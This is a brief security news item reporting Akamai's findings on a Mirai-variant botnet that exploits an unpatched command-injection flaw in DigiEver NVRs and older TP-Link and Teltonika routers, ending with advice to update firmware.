458/67 Thursday, December 26, 2024
A new botnet has been discovered exploiting vulnerabilities in network devices, primarily targeting DigiEver’s DS-2105 Pro Network Video Recorders (NVR), outdated TP-Link routers, and Teltonika RUT9XX routers with old firmware.
This campaign began in September 2024, with the main vulnerability in DigiEver NVRs being a remote code execution (RCE) flaw. Attackers exploit this by sending malicious commands, such as curl and chmod, via the URI /cgi-bin/cgi_main.cgi in HTTP POST requests. This vulnerability currently lacks a CVE number and a fix. The botnet also targets other vulnerabilities, including CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers.
Researchers from Akamai revealed that the new version of Mirai downloads malware binaries from external servers and registers compromised devices into the botnet through command injection. These infected devices are then used for Distributed Denial of Service (DDoS) attacks or to propagate infections to other devices. This new Mirai variant includes advanced capabilities like XOR and ChaCha20 encryption to evade detection.
Akamai researchers noted that the adoption of complex decryption techniques reflects the evolving strategies of botnet developers. While the new Mirai variant builds upon the original source code, it retains some traditional obfuscation methods. To counter these threats, Akamai has released Indicators of Compromise (IoC) and Yara rules for detection and blocking in their latest report.
Users of DigiEver, TP-Link, and Teltonika RUT9XX devices are advised to promptly update firmware, replace vulnerable devices, and review security settings to mitigate attacks by this Mirai-powered botnet.
